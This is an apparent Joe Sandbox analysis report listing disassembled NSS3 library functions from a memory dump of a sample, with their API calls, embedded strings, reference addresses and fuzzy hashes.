Opcode Fuzzy Hash: 2a888c37b57299548786eba51d57121dd48ef4c237a32db38d2260fe09d4eae7
Instruction Fuzzy Hash: 9B31F371A00211ABC720DF38DC80B8AB7E4EF4534DF158029EA189BB61E735E915CBE1

Function 6CCAAF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CCAAFBE
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CDC9500,6CCA3F91), ref: 6CCAAFD2

Part of subcall function 6CCFB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CDD18D0,?), ref: 6CCFB095

DER_GetInteger_Util.NSS3(?), ref: 6CCAB007

Part of subcall function 6CCF6A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6CCA1666,?,6CCAB00C,?), ref: 6CCF6AFB

PR_SetError.NSS3(FFFFE009,00000000), ref: 6CCAB02F
PR_CallOnce.NSS3(6CE02AA4,6CD012D0), ref: 6CCAB046
PL_FreeArenaPool.NSS3 ref: 6CCAB058
PL_FinishArenaPool.NSS3 ref: 6CCAB060

Strings

security, xrefs: 6CCAAFB8

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
String ID: security
API String ID: 3627567351-3315324353
Opcode ID: e592291ef132a43712b667a86325ba088fc137f9e5d578283e4d29774ce6180c
Instruction ID: 96450e5728315e90f6304ecb813b98908c0d5128a21f0834ac74233639b0bc55
Opcode Fuzzy Hash: e592291ef132a43712b667a86325ba088fc137f9e5d578283e4d29774ce6180c
Instruction Fuzzy Hash: 133138B050430597D7108F65D899BAB77B4AF8632CF100618E9B49BBD1F732914BC797

Function 6CCECC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6CCECD08
PK11_DoesMechanism.NSS3(?,?), ref: 6CCECE16
PR_SetError.NSS3(00000000,00000000), ref: 6CCED079

Part of subcall function 6CD4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CD4C2BF

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: c01552cb15c896a432de116be6df8c3aa081040578b189c56ff33b2cd14f5a6f
Instruction ID: a26196d109510efa15cb6c2b2b04b932e2c9eb83421d00fe5963204d012ca091
Opcode Fuzzy Hash: c01552cb15c896a432de116be6df8c3aa081040578b189c56ff33b2cd14f5a6f
Instruction Fuzzy Hash: 43C17DB5A002199FDB20DF25CC80BDABBB4BB4D318F1441A8E948A7741E775AE95CF90

Function 6CCA2C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(0914E8F8), ref: 6CCA2C5D

Part of subcall function 6CD00D30: calloc.MOZGLUE ref: 6CD00D50
Part of subcall function 6CD00D30: TlsGetValue.KERNEL32 ref: 6CD00D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6CCA2C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CCA2CE0

Part of subcall function 6CCA2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CCA2CDA,?,00000000), ref: 6CCA2E1E
Part of subcall function 6CCA2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CCA2E33
Part of subcall function 6CCA2E00: TlsGetValue.KERNEL32 ref: 6CCA2E4E
Part of subcall function 6CCA2E00: EnterCriticalSection.KERNEL32(?), ref: 6CCA2E5E
Part of subcall function 6CCA2E00: PL_HashTableLookup.NSS3(?), ref: 6CCA2E71
Part of subcall function 6CCA2E00: PL_HashTableRemove.NSS3(?), ref: 6CCA2E84
Part of subcall function 6CCA2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CCA2E96
Part of subcall function 6CCA2E00: PR_Unlock.NSS3 ref: 6CCA2EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CCA2D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6CCA2D30
CERT_MakeCANickname.NSS3(00000001), ref: 6CCA2D3F
free.MOZGLUE(00000000), ref: 6CCA2D73
CERT_DestroyCertificate.NSS3(?), ref: 6CCA2DB8
free.MOZGLUE ref: 6CCA2DC8

Part of subcall function 6CCA3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCA3EC2
Part of subcall function 6CCA3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CCA3ED6
Part of subcall function 6CCA3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CCA3EEE
Part of subcall function 6CCA3E60: PR_CallOnce.NSS3(6CE02AA4,6CD012D0), ref: 6CCA3F02
Part of subcall function 6CCA3E60: PL_FreeArenaPool.NSS3 ref: 6CCA3F14
Part of subcall function 6CCA3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CCA3F27

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: 9da3a5cfbcba178c3e68249083626a207b994b6dfab31529133ba09a2a2f6ee3
Instruction ID: 1950f42851555dd3a0e839c567b5b9ac1f1cc203085c0feaf1f07ba70405db93
Opcode Fuzzy Hash: 9da3a5cfbcba178c3e68249083626a207b994b6dfab31529133ba09a2a2f6ee3
Instruction Fuzzy Hash: A351D271A04222ABE710DFA6DC9DB5B77E5EF84348F14042CEC5983A51F731E816CB92

Function 6CCC8F70 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6CCBDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CCC8FAF
PR_Now.NSS3(?,?,00000002,?,?,?,6CCBDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CCC8FD1
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CCBDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CCC8FFA
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CCBDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CCC9013
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CCBDA9B,?,00000000,?,?,?,?,CE534353), ref: 6CCC9042
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CCBDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CCC905A
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CCBDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CCC9073
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CCBDA9B,?,00000000,?,?,?,?,CE534353), ref: 6CCC90EC

Part of subcall function 6CC90F00: PR_GetPageSize.NSS3(6CC90936,FFFFE8AE,?,6CC216B7,00000000,?,6CC90936,00000000,?,6CC2204A), ref: 6CC90F1B
Part of subcall function 6CC90F00: PR_NewLogModule.NSS3(clock,6CC90936,FFFFE8AE,?,6CC216B7,00000000,?,6CC90936,00000000,?,6CC2204A), ref: 6CC90F25

PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CCBDA9B,?,00000000,?,?,?,?,CE534353), ref: 6CCC9111

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
String ID:
API String ID: 2831689957-0
Opcode ID: 8f69fa502d25e92ee2c2f638e8c9444fcaa66479747279de038eac3b37b7bee7
Instruction ID: ba47232ac8069dba7f84d13d38cf87211aee8774591edf17af3b0e85e1522c66
Opcode Fuzzy Hash: 8f69fa502d25e92ee2c2f638e8c9444fcaa66479747279de038eac3b37b7bee7
Instruction Fuzzy Hash: 00519A75B046048FDF00EF78C488699BBF4BF4A318F054569DD449BB16EB31E885CB92

Function 6CD04DF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6CD0536F,00000022,?,?,00000000,?), ref: 6CD04E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6CD04F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6CD04F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6CD04FAE
free.MOZGLUE(?), ref: 6CD04FC8

Strings

%s=%c%s%c, xrefs: 6CD04FA9
%s=%s, xrefs: 6CD04F89

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s
API String ID: 2709355791-2032576422
Opcode ID: b6596fd3e62583abda3a278807f56f87e2348535c0e511dfb03051106199fe6e
Instruction ID: fd01c24bac73b4515e7b9395386118e00ee3487c408368890e38b9ee51857f65
Opcode Fuzzy Hash: b6596fd3e62583abda3a278807f56f87e2348535c0e511dfb03051106199fe6e
Instruction Fuzzy Hash: 06514561F05145CBEB01CF6D8490BFF7FF5AFA2308F288166E890A7A61D325D80587A0

Function 6CD72F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CD72FFD
sqlite3_initialize.NSS3 ref: 6CD73007
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CD73032
sqlite3_mprintf.NSS3(6CDDAAF9,?), ref: 6CD73073
sqlite3_free.NSS3(?), ref: 6CD730B3
sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6CD730C0

Strings

sqlite3_get_table() called with two or more incompatible queries, xrefs: 6CD730BB

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
String ID: sqlite3_get_table() called with two or more incompatible queries
API String ID: 750880481-4279182443
Opcode ID: 5cc8afebef6f9e4bf2cc8d009ed2716c9a06d689fa5443ab83741596b5667d30
Instruction ID: 7af499348457481207feeb5dbe0b4fb99fdb43e55b065386a54f947dab4f9cfe
Opcode Fuzzy Hash: 5cc8afebef6f9e4bf2cc8d009ed2716c9a06d689fa5443ab83741596b5667d30
Instruction Fuzzy Hash: 8841C271600606EFDB10CF25D884A86B7E5FF44368F148629EC5987B60E731F955CBE0

Function 6CCDACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6CCDACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CCDAD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CCDAD23

Part of subcall function 6CDBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CDBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CCDAD39

Strings

hSession = 0x%x, xrefs: 6CCDACFE, 6CCDAD0E
C_MessageDecryptFinal, xrefs: 6CCDACE1
(CK_INVALID_HANDLE), xrefs: 6CCDAD1C

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
API String ID: 332880674-3521875567
Opcode ID: 36a15abce777dfb06ad852536694debfe397d0486fe84d2f8aa224ad6b080b27
Instruction ID: 770fd5b5cb7026d6b2ba67a5fbb8e3c7459b422e3faf0eef5e1c7614d086da5f
Opcode Fuzzy Hash: 36a15abce777dfb06ad852536694debfe397d0486fe84d2f8aa224ad6b080b27
Instruction Fuzzy Hash: 16212971700144AFEB00DF64DD88B6A37B5EB8271EF05406DE50AA7A61EB35E818C7E2

Function 6CCB8CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6CCC124D,00000001), ref: 6CCB8D19
EnterCriticalSection.KERNEL32(?,?,?,?,6CCC124D,00000001), ref: 6CCB8D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6CCC124D,00000001), ref: 6CCB8D73
PR_Unlock.NSS3(?,?,?,?,?,6CCC124D,00000001), ref: 6CCB8D8C

Part of subcall function 6CD4DD70: TlsGetValue.KERNEL32 ref: 6CD4DD8C
Part of subcall function 6CD4DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CD4DDB4

PR_Unlock.NSS3(?,?,?,?,?,6CCC124D,00000001), ref: 6CCB8DBA

Strings

KRAM, xrefs: 6CCB8D3E
KRAM, xrefs: 6CCB8CF9

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: 11ca5a43f424ee97b85d23b2186ba459706cb0ddd27a546f0fba8793d72ebe8d
Instruction ID: a54cec008e9a108b41686f3949845da86707d3b02cc45c0ca17b0843e1b90527
Opcode Fuzzy Hash: 11ca5a43f424ee97b85d23b2186ba459706cb0ddd27a546f0fba8793d72ebe8d
Instruction Fuzzy Hash: 6E21A1B5A04602CFDB00EFB9C48495AB7F4FF45318F1589ABD99897701E734D842CB91

Function 6CDB0ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CDB0EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CDB0EFA

Part of subcall function 6CC9AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CC9AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CDB0F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CDB0F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CDB0F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CDB0F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6CDB0ED9, 6CDB0EE5, 6CDB0F06, 6CDB0F0B
Aborting, xrefs: 6CDB0EB3

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: 8a53daee03813375b879ddcb7cf140746ce2e7c9168f7ebf96bdce7f4b699319
Instruction ID: 1af8226ed69907b952738f846879822fe2b7fde6c0c87d9e071268941c96122b
Opcode Fuzzy Hash: 8a53daee03813375b879ddcb7cf140746ce2e7c9168f7ebf96bdce7f4b699319
Instruction Fuzzy Hash: 5601C4F5A00104BBEF11AF54EC4589B3F7CEF86368B004014FE1A97711D631ED2087A2

Function 6CD74D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CD74DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CD74DE0

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CD74DCB
invalid, xrefs: 6CD74DB8
misuse, xrefs: 6CD74DD5
%s at line %d of [%.10s], xrefs: 6CD74DDA
API call with %s database connection pointer, xrefs: 6CD74DBD

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: d8170cf107edd592666fcc0753c59a3f57061719825e83bc00c90350252cdda5
Instruction ID: 80a1eb5e2446442149576df9f3550460800128348f949245d99e6fbc7b968def
Opcode Fuzzy Hash: d8170cf107edd592666fcc0753c59a3f57061719825e83bc00c90350252cdda5
Instruction Fuzzy Hash: 25F05911F05524ABF7224315DE14F8233554F02319F4709E0ED886BE72E225FC6887E0

Function 6CD74DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CD74E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CD74E4D

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CD74E38
invalid, xrefs: 6CD74E25
misuse, xrefs: 6CD74E42
%s at line %d of [%.10s], xrefs: 6CD74E47
API call with %s database connection pointer, xrefs: 6CD74E2A

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 6637ded0c72a8c0b0a48f8ea671a48a2579d30a9cdf971abde905ec3891c797e
Instruction ID: 1e16748d98ebfc929edb7aa00c4c384d74600d1438b4c492d18d6c2af4601545
Opcode Fuzzy Hash: 6637ded0c72a8c0b0a48f8ea671a48a2579d30a9cdf971abde905ec3891c797e
Instruction Fuzzy Hash: 74F02711F44928ABFA3213259C10F9337854B0133AF4A84E1EA4867EB2E725F87947F1

Function 6CCE0C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6CCE1444,?,00000001,?,00000000,00000000,?,?,6CCE1444,?,?,00000000,?,?), ref: 6CCE0CB3

Part of subcall function 6CD4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CD4C2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CCE1444,?,00000001,?,00000000,00000000,?,?,6CCE1444,?), ref: 6CCE0DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6CCE1444,?,00000001,?,00000000,00000000,?,?,6CCE1444,?), ref: 6CCE0DEC

Part of subcall function 6CD00F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CCA2AF5,?,?,?,?,?,6CCA0A1B,00000000), ref: 6CD00F1A
Part of subcall function 6CD00F10: malloc.MOZGLUE(00000001), ref: 6CD00F30
Part of subcall function 6CD00F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CD00F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6CCE1444,?,00000001,?,00000000,00000000,?), ref: 6CCE0DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6CCE1444,?,00000001,?,00000000), ref: 6CCE0E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CCE1444,?,00000001,?,00000000,00000000,?), ref: 6CCE0E53
PR_GetCurrentThread.NSS3(?,?,?,?,6CCE1444,?,00000001,?,00000000,00000000,?,?,6CCE1444,?,?,00000000), ref: 6CCE0E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CCE1444,?,00000001,?,00000000,00000000,?), ref: 6CCE0E79

Part of subcall function 6CCF1560: TlsGetValue.KERNEL32(00000000,?,6CCC0844,?), ref: 6CCF157A
Part of subcall function 6CCF1560: EnterCriticalSection.KERNEL32(?,?,?,6CCC0844,?), ref: 6CCF158F
